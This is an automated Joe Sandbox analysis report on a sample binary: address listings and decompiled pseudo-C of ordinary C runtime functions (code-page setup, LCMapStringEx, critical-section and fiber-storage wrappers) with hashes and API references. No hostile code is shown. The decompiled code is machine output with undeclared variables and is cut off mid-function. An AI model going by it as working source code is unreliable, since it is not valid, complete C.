0x00e7c293
0x00e7c298
0x00e7c2a2
0x00e7c2a8
0x00e7c2ab
0x00e7c27d
0x00e7c27d
0x00e7c27e
0x00000000
0x00e7c2ad
0x00e7c2bb
0x00e7c2c1
0x00e7c2c3
0x00e7c2cf
0x00e7c2cf
0x00000000
0x00e7c2c3
0x00e7c2ab
0x00e7c276
0x00e7c1b5
0x00e7c1c4
0x00e7c1d1
0x00e7c1e2
0x00e7c1e5
0x00e7c1e8
0x00e7c1fb
0x00e7c202
0x00e7c207
0x00e7c209
0x00000000
0x00000000
0x00e7c20f
0x00e7c216
0x00e7c21b
0x00e7c220
0x00e7c22c
0x00e7c231
0x00e7c234
0x00e7c23b
0x00e7c23d
0x00e7c23e
0x00e7c248
0x00e7c24e
0x00e7c24f
0x00000000
0x00e7c24f
0x00e7c1ea
0x00e7c1f1
0x00e7c1f7
0x00e7c1f9
0x00000000
0x00000000
0x00000000
0x00e7c1f9
0x00e7c2f0
0x00e7c2f0
0x00e7c2fa
0x00e7c2fa
0x00000000
0x00000000
0x00e7c304
0x00e7c304
0x00e7c306
0x00e7c359
0x00e7c35e
0x00e7c367
0x00e7c368
0x00e7c36e
0x00e7c373
0x00e7c376
0x00e7c378
0x00e7c38a
0x00e7c38f
0x00e7c390
0x00e7c390
0x00e7c391
0x00e7c393
0x00e7c39a
0x00e7c39f
0x00e7c393
0x00000000
0x00000000
0x00e7c3a5
0x00e7c3a5
0x00e7c3a7
0x00e7c3b7
0x00e7c3b7
0x00000000
0x00000000
0x00e7c3c2
0x00e7c3c2
0x00e7c3c4
0x00000000
0x00000000
0x00e7c3ca
0x00e7c3ca
0x00e7c3d1
0x00000000
0x00000000
0x00e7c3d7
0x00e7c3d7
0x00e7c3d9
0x00e7c3df
0x00e7c3e1
0x00e7c3e8
0x00e7c3e9
0x00e7c3f0
0x00e7c3f2
0x00e7c3f2
0x00e7c3f9
0x00e7c3fe
0x00e7c404
0x00e7c406
0x00000000
0x00e7c40c
0x00e7c40c
0x00e7c40c
0x00e7c40f
0x00e7c411
0x00e7c412
0x00e7c415
0x00e7c43e
0x00e7c43e
0x00e7c441
0x00e7c526
0x00e7c52f
0x00e7c534
0x00e7c534
0x00e7c536
0x00e7c536
0x00e7c538
0x00e7c53a
0x00e7c541
0x00e7c546
0x00e7c547
0x00e7c548
0x00e7c54a
0x00e7c54c
0x00e7c550
0x00e7c552
0x00e7c552
0x00e7c554
0x00e7c554
0x00e7c550
0x00e7c558
0x00e7c55e
0x00e7c56b
0x00e7c572
0x00e7c582
0x00e7c58c
0x00e7c59a
0x00e7c5a0
0x00e7c5a8
0x00e7c5ad
0x00e7c5ae
0x00e7c5af
0x00e7c5b1
0x00e7c5c5
0x00e7c5c5
0x00000000
0x00e7c5b1
0x00e7c447
0x00e7c447
0x00e7c44a
0x00e7c457
0x00e7c457
0x00e7c45a
0x00e7c46a
0x00e7c470
0x00e7c472
0x00e7c474
0x00e7c477
0x00e7c47e
0x00e7c47f
0x00e7c485
0x00e7c486
0x00e7c489
0x00e7c48a
0x00e7c48b
0x00e7c490
0x00e7c49c
0x00e7c4a2
0x00e7c4a5
0x00e7c4aa
0x00e7c4ac
0x00e7c4ae
0x00e7c4b0
0x00e7c4b0
0x00e7c4b2
0x00e7c4b2
0x00e7c4b4
0x00e7c4b4
0x00e7c4bc
0x00e7c4c3
0x00e7c4c5
0x00e7c4cc
0x00e7c4d2
0x00e7c4d4
0x00e7c4d5
0x00e7c4dd
0x00e7c4ec
0x00e7c4ec
0x00e7c4dd
0x00e7c4f7
0x00e7c4f9
0x00e7c508
0x00e7c50e
0x00e7c514
0x00e7c51f
0x00e7c51f
0x00000000
0x00e7c514
0x00e7c44c
0x00e7c44c
0x00e7c451
0x00000000
0x00000000
0x00000000
0x00e7c451
0x00e7c417
0x00e7c417
0x00e7c41b
0x00000000
0x00000000
0x00e7c41d
0x00e7c41d
0x00e7c420
0x00e7c422
0x00e7c425
0x00000000
0x00e7c42b
0x00e7c434
0x00000000
0x00e7c434
0x00e7c425
0x00000000
0x00e7c5d0
0x00e7c5d0
0x00e7c5d1
0x00e7c5d6
0x00e7c5d8
0x00e7c5db
0x00e7c5db
0x00000000
0x00e7c611
0x00e7c611
0x00e7c618
0x00e7c61a
0x00e7c61a
0x00e7c61c
0x00e7c64b
0x00e7c64b
0x00e7c651
0x00000000
0x00e7c651
0x00e7c61e
0x00e7c61e
0x00e7c61e
0x00e7c621
0x00e7c63a
0x00e7c63a
0x00e7c640
0x00e7c640
0x00000000
0x00e7c640
0x00e7c623
0x00e7c623
0x00e7c623
0x00e7c626
0x00000000
0x00000000
0x00e7c628
0x00e7c628
0x00e7c628
0x00e7c62b
0x00000000
0x00000000
0x00e7c631
0x00e7c631
0x00000000
0x00000000
0x00e7c69e
0x00e7c69e
0x00e7c6a0
0x00e7c6a7
0x00e7c6a8
0x00e7c6ae
0x00e7c6b6
0x00e7c75a
0x00e7c75a
0x00e7c75e
0x00e7c775
0x00e7c775
0x00e7c779
0x00e7c77f
0x00e7c782
0x00e7c78f
0x00e7c78f
0x00e7c782
0x00000000
0x00e7c779
0x00e7c760
0x00e7c760
0x00e7c763
0x00000000
0x00000000
0x00e7c769
0x00e7c770
0x00000000
0x00e7c770
0x00e7c6bc
0x00e7c6bc
0x00e7c6c2
0x00e7c6c4
0x00e7c6c5
0x00e7c6ca
0x00e7c6cb
0x00e7c6cc
0x00e7c6ce
0x00000000
0x00000000
0x00e7c6d4
0x00e7c6d4
0x00e7c6d4
0x00e7c6d7
0x00e7c6da
0x00e7c6da
0x00e7c6dc
0x00e7c6df
0x00e7c6e5
0x00e7c6e7
0x00e7c6e8
0x00e7c6ee
0x00e7c6ef
0x00e7c6ef
0x00e7c6f4
0x00e7c6f6
0x00e7c6f8
0x00000000
0x00000000
0x00e7c6fa
0x00e7c6fa
0x00e7c702
0x00000000
0x00000000
0x00e7c704
0x00e7c709
0x00e7c710
0x00e7c715
0x00e7c71c
0x00e7c71e
0x00e7c720
0x00e7c727
0x00e7c72c
0x00e7c72e
0x00e7c730
0x00e7c732
0x00e7c732
0x00e7c738
0x00e7c73f
0x00e7c744
0x00e7c746
0x00e7c748
0x00e7c74a
0x00e7c74a
0x00e7c74b
0x00e7c74d
0x00e7c753
0x00e7c754
0x00e7c754
0x00e7c757
0x00e7c757
0x00000000
0x00000000
0x00e7c7c3
0x00e7c7c3
0x00e7c7c6
0x00e7c947
0x00e7c947
0x00e7c94a
0x00e7c950
0x00e7c957
0x00e7c959
0x00e7c959
0x00e7c963
0x00e7c963
0x00000000
0x00e7c94a
0x00e7c7cc
0x00e7c7cc
0x00e7c7d2
0x00e7c7e0
0x00e7c7ec
0x00e7c7ee
0x00e7c7f0
0x00e7c7f5
0x00e7c7f5
0x00e7c7f5
0x00e7c80d
0x00e7c81a
0x00e7c81f
0x00e7c821
0x00000000
0x00000000
0x00e7c7f3
0x00e7c7f3
0x00e7c7f3
0x00e7c7f4
0x00e7c7f4
0x00e7c823
0x00e7c82d
0x00e7c833
0x00e7c83b
0x00000000
0x00000000
0x00e7c841
0x00e7c841
0x00e7c848
0x00000000
0x00000000
0x00e7c84e
0x00e7c84e
0x00e7c850
0x00e7c857
0x00e7c85d
0x00e7c85f
0x00e7c860
0x00e7c865
0x00e7c866
0x00e7c867
0x00e7c869
0x00e7c8bd
0x00e7c8bd
0x00e7c8c5
0x00e7c8d3
0x00e7c8e4
0x00e7c8f2
0x00e7c8f2
0x00e7c8fe
0x00e7c903
0x00e7c905
0x00e7c915
0x00e7c91f
0x00e7c924
0x00e7c927
0x00000000
0x00e7c92d
0x00e7c92d
0x00e7c932
0x00e7c932
0x00e7c934
0x00e7c93b
0x00e7c941
0x00000000
0x00e7c941
0x00e7c927
0x00e7c86b
0x00e7c86b
0x00e7c86d
0x00e7c86f
0x00e7c876
0x00000000
0x00000000
0x00e7c878
0x00e7c878
0x00e7c87a
0x00e7c880
0x00e7c880
0x00e7c880
0x00e7c884
0x00000000
0x00000000
0x00e7c886
0x00e7c886
0x00e7c887
0x00e7c88d
0x00e7c890
0x00e7c892
0x00e7c895
0x00000000
0x00000000
0x00e7c897
0x00000000
0x00e7c897
0x00e7c899
0x00e7c8a4
0x00e7c8ae
0x00e7c8b3
0x00e7c8b3
0x00e7c8b5
0x00000000
0x00000000
0x00e7c96f
0x00e7c96f
0x00e7c972
0x00e7c974
0x00e7c97b
0x00e7c97d
0x00e7c983
0x00e7c984
0x00e7c989
0x00e7c98a
0x00e7c98a
0x00e7c98f
0x00e7c992
0x00e7c998
0x00e7c998
0x00e7c99d
0x00000000
0x00000000
0x00000000
0x00000000
0x00e7cd14
0x00e7cd14
0x00e7cd17
0x00e7cd19
0x00e7cd19
0x00000000
0x00000000
0x00e7c65d
0x00e7c65d
0x00e7c665
0x00e7c66b
0x00e7c66e
0x00e7c692
0x00e7c670
0x00e7c670
0x00e7c673
0x00e7c686
0x00e7c675
0x00e7c675
0x00e7c677
0x00e7c67c
0x00e7c67c
0x00e7c673
0x00000000
0x00000000
0x00e7c799
0x00e7c799
0x00e7c79a
0x00e7c79f
0x00e7c79f
0x00e7c79f
0x00e7c7a2
0x00e7c7a7
0x00e7c7ad
0x00e7c7ad
0x00e7c7b3
0x00e7c7b9
0x00e7c7b9
0x00000000
0x00000000
0x00e7c0e8
0x00e7c0e8
0x00e7c0ed
0x00e7c0ee
0x00e7c0ef
0x00e7c0f4
0x00e7c0fa
0x00e7c0fd
0x00000000
0x00e7c0ff
0x00e7c0ff
0x00000000
0x00e7c0ff
0x00e7c0fd
0x00e7cd51
0x00e7cd57
0x00e7cd61
0x00e7cd61
0x00000000
0x00e7cc52
0x00e7cc43
0x00000000
0x00e7ca4d

APIs

SHChangeNotify.SHELL32(00001000,00000005,?,00000000), ref: 00E7CD0C

Strings

.lnk, xrefs: 00E7CC45, 00E7CC55

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: ChangeNotify
String ID: .lnk
API String ID: 3893256919-24824748
Opcode ID: 8a246096892c56592ad44062d1250ffaae3ef5679e2c1094c8008ad7f9fb12ea
Instruction ID: 26033c5078c08832acc1e45659a8a1ce7f171786d9370a20b613b94fdc5670bf
Opcode Fuzzy Hash: 8a246096892c56592ad44062d1250ffaae3ef5679e2c1094c8008ad7f9fb12ea
Instruction Fuzzy Hash: 50A15172D40258A9DF21EBA0DC46EEEB3BCAF44704F1195ABB60DF3051E6749BC49B60

Uniqueness

Uniqueness Score: -1.00%

Function 00E8B303 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00E8B303(void* __ebx, signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				char _v264;
				char _v520;
				char _v776;
				char _v1800;
				char _v1814;
				struct _cpinfo _v1820;
				intOrPtr _v1824;
				signed int _v1828;
				signed int _t63;
				void* _t67;
				signed int _t68;
				intOrPtr _t69;
				void* _t72;
				char _t73;
				char _t74;
				signed char _t75;
				signed int _t76;
				signed char _t86;
				char _t87;
				char _t90;
				signed int _t93;
				signed int _t94;
				signed int _t95;
				void* _t96;
				char* _t97;
				intOrPtr _t101;
				signed int _t102;

				_t95 = __edx;
				_t63 =  *0xe9e668; // 0x8ae5c3d8
				_v8 = _t63 ^ _t102;
				_t101 = _a4;
				_t4 = _t101 + 4; // 0x5efc4d8b
				if(GetCPInfo( *_t4,  &_v1820) == 0) {
					_t47 = _t101 + 0x119; // 0xe8b956
					_t96 = _t47;
					_t90 = 0;
					_t67 = 0xffffff9f;
					_t68 = _t67 - _t96;
					__eflags = _t68;
					_v1828 = _t68;
					do {
						_t97 = _t96 + _t90;
						_t69 = _t68 + _t97;
						_v1824 = _t69;
						__eflags = _t69 + 0x20 - 0x19;
						if(_t69 + 0x20 > 0x19) {
							__eflags = _v1824 - 0x19;
							if(_v1824 > 0x19) {
								 *_t97 = 0;
							} else {
								_t72 = _t101 + _t90;
								_t57 = _t72 + 0x19;
								 *_t57 =  *(_t72 + 0x19) | 0x00000020;
								__eflags =  *_t57;
								_t59 = _t90 - 0x20; // -32
								_t73 = _t59;
								goto L24;
							}
						} else {
							 *(_t101 + _t90 + 0x19) =  *(_t101 + _t90 + 0x19) | 0x00000010;
							_t54 = _t90 + 0x20; // 0x20
							_t73 = _t54;
							L24:
							 *_t97 = _t73;
						}
						_t68 = _v1828;
						_t61 = _t101 + 0x119; // 0xe8b956
						_t96 = _t61;
						_t90 = _t90 + 1;
						__eflags = _t90 - 0x100;
					} while (_t90 < 0x100);
				} else {
					_t74 = 0;
					do {
						 *((char*)(_t102 + _t74 - 0x104)) = _t74;
						_t74 = _t74 + 1;
					} while (_t74 < 0x100);
					_t75 = _v1814;
					_t93 =  &_v1814;
					_v264 = 0x20;
					while(1) {
						_t108 = _t75;
						if(_t75 == 0) {
							break;
						}
						_t95 =  *(_t93 + 1) & 0x000000ff;
						_t76 = _t75 & 0x000000ff;
						while(1) {
							__eflags = _t76 - _t95;
							if(_t76 > _t95) {
								break;
							}
							__eflags = _t76 - 0x100;
							if(_t76 < 0x100) {
								 *((char*)(_t102 + _t76 - 0x104)) = 0x20;
								_t76 = _t76 + 1;
								__eflags = _t76;
								continue;
							}
							break;
						}
						_t93 = _t93 + 2;
						__eflags = _t93;
						_t75 =  *_t93;
					}
					_t13 = _t101 + 4; // 0x5efc4d8b
					E00E8C3F8(0, _t95, 0x100, _t101, _t108, 0, 1,  &_v264, 0x100,  &_v1800,  *_t13, 0);
					_t16 = _t101 + 4; // 0x5efc4d8b
					_t19 = _t101 + 0x21c; // 0xdb855708
					E00E8A585(0x100, _t101, _t108, 0,  *_t19, 0x100,  &_v264, 0x100,  &_v520, 0x100,  *_t16, 0); // executed
					_t21 = _t101 + 4; // 0x5efc4d8b
					_t23 = _t101 + 0x21c; // 0xdb855708
					E00E8A585(0x100, _t101, _t108, 0,  *_t23, 0x200,  &_v264, 0x100,  &_v776, 0x100,  *_t21, 0);
					_t94 = 0;
					do {
						_t86 =  *(_t102 + _t94 * 2 - 0x704) & 0x0000ffff;
						if((_t86 & 0x00000001) == 0) {
							__eflags = _t86 & 0x00000002;
							if((_t86 & 0x00000002) == 0) {
								 *((char*)(_t101 + _t94 + 0x119)) = 0;
							} else {
								_t37 = _t101 + _t94 + 0x19;
								 *_t37 =  *(_t101 + _t94 + 0x19) | 0x00000020;
								__eflags =  *_t37;
								_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x304));
								goto L15;
							}
						} else {
							 *(_t101 + _t94 + 0x19) =  *(_t101 + _t94 + 0x19) | 0x00000010;
							_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x204));
							L15:
							 *((char*)(_t101 + _t94 + 0x119)) = _t87;
						}
						_t94 = _t94 + 1;
					} while (_t94 < 0x100);
				}
				return E00E7EEFA(_v8 ^ _t102);
			}

0x00e8b303
0x00e8b30e
0x00e8b315
0x00e8b31a
0x00e8b325
0x00e8b337
0x00e8b42f
0x00e8b42f
0x00e8b435
0x00e8b437
0x00e8b438
0x00e8b438
0x00e8b43a
0x00e8b440
0x00e8b440
0x00e8b442
0x00e8b444
0x00e8b44d
0x00e8b450
0x00e8b45c
0x00e8b463
0x00e8b473
0x00e8b465
0x00e8b465
0x00e8b468
0x00e8b468
0x00e8b468
0x00e8b46c
0x00e8b46c
0x00000000
0x00e8b46c
0x00e8b452
0x00e8b452
0x00e8b457
0x00e8b457
0x00e8b46f
0x00e8b46f
0x00e8b46f
0x00e8b475
0x00e8b47b
0x00e8b47b
0x00e8b481
0x00e8b482
0x00e8b482
0x00e8b33d
0x00e8b33d
0x00e8b33f
0x00e8b33f
0x00e8b346
0x00e8b347
0x00e8b34b
0x00e8b351
0x00e8b357
0x00e8b37f
0x00e8b37f
0x00e8b381
0x00000000
0x00000000
0x00e8b360
0x00e8b364
0x00e8b376
0x00e8b376
0x00e8b378
0x00000000
0x00000000
0x00e8b369
0x00e8b36b
0x00e8b36d
0x00e8b375
0x00e8b375
0x00000000
0x00e8b375
0x00000000
0x00e8b36b
0x00e8b37a
0x00e8b37a
0x00e8b37d
0x00e8b37d
0x00e8b384
0x00e8b399
0x00e8b39f
0x00e8b3b3
0x00e8b3ba
0x00e8b3c9
0x00e8b3db
0x00e8b3e2
0x00e8b3ea
0x00e8b3ec
0x00e8b3ec
0x00e8b3f6
0x00e8b406
0x00e8b408
0x00e8b41f
0x00e8b40a
0x00e8b40a
0x00e8b40a
0x00e8b40a
0x00e8b40f
0x00000000
0x00e8b40f
0x00e8b3f8
0x00e8b3f8
0x00e8b3fd
0x00e8b416
0x00e8b416
0x00e8b416
0x00e8b426
0x00e8b427
0x00e8b42b
0x00e8b496

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00E8B328

Strings

, xrefs: 00E8B36D

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: bbc935d792763d081a79e15a6de5d555ca96069b2cba31fd11573f3844e50ef8
Instruction ID: ac7b1a97f0c2209eb90bb9c7da431453bb61d7d63643fe026e5c2c440d7d70ee
Opcode Fuzzy Hash: bbc935d792763d081a79e15a6de5d555ca96069b2cba31fd11573f3844e50ef8
Instruction Fuzzy Hash: 7541377050438C9EDB229F248C85AFABBE9EB15308F1414EDE59EA6143E335AA45DF20

Uniqueness

Uniqueness Score: -1.00%

Function 00E8AA3C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 30%

			E00E8AA3C(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4, int _a8, short* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _t18;
				intOrPtr* _t20;
				intOrPtr* _t31;
				signed int _t33;

				_t26 = __ecx;
				_push(__ecx);
				_t18 =  *0xe9e668; // 0x8ae5c3d8
				_v8 = _t18 ^ _t33;
				_push(__esi);
				_t20 = E00E8A768(0x16, "LCMapStringEx", 0xe97374, "LCMapStringEx"); // executed
				_t31 = _t20;
				if(_t31 == 0) {
					LCMapStringW(E00E8AAC4(_t26, _t31, __eflags, _a4, 0), _a8, _a12, _a16, _a20, _a24);
				} else {
					 *0xe93260(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
					 *_t31();
				}
				return E00E7EEFA(_v8 ^ _t33);
			}

0x00e8aa3c
0x00e8aa41
0x00e8aa42
0x00e8aa49
0x00e8aa4c
0x00e8aa5e
0x00e8aa63
0x00e8aa6a
0x00e8aaad
0x00e8aa6c
0x00e8aa89
0x00e8aa8f
0x00e8aa8f
0x00e8aac1

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,8FE85006,00000001,?,000000FF), ref: 00E8AAAD

Strings

LCMapStringEx, xrefs: 00E8AA4D, 00E8AA57

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: 10392bcdcc95f454aab886c9d33aa6db40e0c179dc8d7df7960e5b5513c6fc37
Instruction ID: 32d9d189824e1e6ab5da605aa815c6a0fd08eb0fc4c598939ee58c4c46bf319e
Opcode Fuzzy Hash: 10392bcdcc95f454aab886c9d33aa6db40e0c179dc8d7df7960e5b5513c6fc37
Instruction Fuzzy Hash: 53012532504209BBDF06AFA0DD01DEE7FA6EF08750F045166FE1836160C6328931EB91

Uniqueness

Uniqueness Score: -1.00%

Function 00E8A9DA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 21%

			E00E8A9DA(void* __ecx, void* __esi, void* __eflags, struct _CRITICAL_SECTION* _a4, long _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _t8;
				intOrPtr* _t10;
				intOrPtr* _t20;
				signed int _t22;

				_push(__ecx);
				_t8 =  *0xe9e668; // 0x8ae5c3d8
				_v8 = _t8 ^ _t22;
				_t10 = E00E8A768(0x14, "InitializeCriticalSectionEx", 0xe9736c, 0xe97374); // executed
				_t20 = _t10;
				if(_t20 == 0) {
					InitializeCriticalSectionAndSpinCount(_a4, _a8);
				} else {
					 *0xe93260(_a4, _a8, _a12);
					 *_t20();
				}
				return E00E7EEFA(_v8 ^ _t22);
			}

0x00e8a9df
0x00e8a9e0
0x00e8a9e7
0x00e8a9fc
0x00e8aa01
0x00e8aa08
0x00e8aa25
0x00e8aa0a
0x00e8aa15
0x00e8aa1b
0x00e8aa1b
0x00e8aa39

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00E8A03F), ref: 00E8AA25

Strings

InitializeCriticalSectionEx, xrefs: 00E8A9F5

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: bf6e006da21c851b7e51c00cc1861eb1e9e965e3622a94fc6454123f4db2dbe5
Instruction ID: 994c7c72bb908e9e0c66f828751d460b7f6d6ac6012acdb0cc2f3ea3db599011
Opcode Fuzzy Hash: bf6e006da21c851b7e51c00cc1861eb1e9e965e3622a94fc6454123f4db2dbe5
Instruction Fuzzy Hash: A8F0B431655318BBDF05AF65CC05C9E7FA1EF08720B009067FD0D3A261DA724E10E781

Uniqueness

Uniqueness Score: -1.00%

Function 00E8A87F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30
memoryCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E00E8A87F(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _t4;
				intOrPtr* _t6;
				intOrPtr* _t16;
				signed int _t18;

				_push(__ecx);
				_t4 =  *0xe9e668; // 0x8ae5c3d8
				_v8 = _t4 ^ _t18;
				_t6 = E00E8A768(3, "FlsAlloc", 0xe97330, 0xe97338); // executed
				_t16 = _t6;
				if(_t16 == 0) {
					TlsAlloc();
				} else {
					 *0xe93260(_a4);
					 *_t16();
				}
				return E00E7EEFA(_v8 ^ _t18);
			}

0x00e8a884
0x00e8a885
0x00e8a88c
0x00e8a8a1
0x00e8a8a6
0x00e8a8ad
0x00e8a8be
0x00e8a8af
0x00e8a8b4
0x00e8a8ba
0x00e8a8ba
0x00e8a8d2

APIs

TlsAlloc.KERNEL32 ref: 00E8A8BE

Strings

FlsAlloc, xrefs: 00E8A89A

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: 690421ae247919b3b78b37e69cb48662bf9933f248b9ed9630804bc02c9c9da8
Instruction ID: 789acbbb2d57d981777c2602371e214d4fc0b6ea11230d2138f9245f4f668cf1
Opcode Fuzzy Hash: 690421ae247919b3b78b37e69cb48662bf9933f248b9ed9630804bc02c9c9da8
Instruction Fuzzy Hash: 6EE05530A55318BFA714BB658C069AEBBA4CB15B10B401167FC0D37240DE300E0197D6

Uniqueness

Uniqueness Score: -1.00%

Function 00E8B660 Relevance: 3.2, APIs: 2, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00E8B660(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				signed int _v32;
				signed int _v36;
				signed int _t48;
				int _t51;
				signed int _t54;
				signed int _t55;
				short _t58;
				signed char _t62;
				signed int _t63;
				signed char* _t72;
				signed char* _t73;
				int _t78;
				signed int _t81;
				signed char* _t82;
				short* _t83;
				int _t87;
				signed char _t88;
				signed int _t89;
				signed int _t91;
				signed int _t92;
				int _t94;
				int _t95;
				intOrPtr _t98;
				signed int _t99;

				_t48 =  *0xe9e668; // 0x8ae5c3d8
				_v8 = _t48 ^ _t99;
				_t98 = _a8;
				_t78 = E00E8B22B(__eflags, _a4);
				if(_t78 != 0) {
					_t94 = 0;
					__eflags = 0;
					_t81 = 0;
					_t51 = 0;
					_v32 = 0;
					while(1) {
						__eflags =  *((intOrPtr*)(_t51 + 0xe9e828)) - _t78;
						if( *((intOrPtr*)(_t51 + 0xe9e828)) == _t78) {
							break;
						}
						_t81 = _t81 + 1;
						_t51 = _t51 + 0x30;
						_v32 = _t81;
						__eflags = _t51 - 0xf0;
						if(_t51 < 0xf0) {
							continue;
						} else {
							__eflags = _t78 - 0xfde8;
							if(_t78 == 0xfde8) {
								L23:
							} else {
								__eflags = _t78 - 0xfde9;
								if(_t78 == 0xfde9) {
									goto L23;
								} else {
									_t51 = IsValidCodePage(_t78 & 0x0000ffff);
									__eflags = _t51;
									if(_t51 == 0) {
										goto L23;
									} else {
										_t51 = GetCPInfo(_t78,  &_v28);
										__eflags = _t51;
										if(_t51 == 0) {
											__eflags =  *0xec16cc - _t94; // 0x0
											if(__eflags == 0) {
												goto L23;
											} else {
												E00E8B29E(_t98);
												goto L37;
											}
										} else {
											E00E7F5F0(_t94, _t98 + 0x18, _t94, 0x101);
											 *(_t98 + 4) = _t78;
											 *(_t98 + 0x21c) = _t94;
											_t78 = 1;
											__eflags = _v28 - 1;
											if(_v28 <= 1) {
												 *(_t98 + 8) = _t94;
											} else {
												__eflags = _v22;
												_t72 =  &_v22;
												if(_v22 != 0) {
													while(1) {
														_t88 = _t72[1];
														__eflags = _t88;
														if(_t88 == 0) {
															goto L16;
														}
														_t91 = _t88 & 0x000000ff;
														_t89 =  *_t72 & 0x000000ff;
														while(1) {
															__eflags = _t89 - _t91;
															if(_t89 > _t91) {
																break;
															}
															 *(_t98 + _t89 + 0x19) =  *(_t98 + _t89 + 0x19) | 0x00000004;
															_t89 = _t89 + 1;
															__eflags = _t89;
														}
														_t72 =  &(_t72[2]);
